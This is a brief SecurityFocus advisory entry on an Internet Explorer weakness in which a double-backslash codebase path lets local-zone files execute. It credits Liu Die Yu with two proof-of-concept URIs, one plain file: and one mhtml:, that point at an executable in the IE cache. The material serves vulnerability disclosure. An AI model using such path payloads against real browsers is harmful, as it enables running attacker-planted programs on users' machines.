Microsoft Internet Explorer Codebase Double Backslash Local Zone File Execution Weakness

The following proof-of-concepts were provided by Liu Die Yu:

file://[SysDrive]:\\[INTERNET CACHE PATH]\CONTENT.IE5\EXE.EXE

mhtml:file://[SysDrive]:\\[INTERNET CACHE PATH]\CONTENT.IE5\MHT.MHT!file:///C:\EXE.EXE


 

Privacy Statement
Copyright 2010, SecurityFocus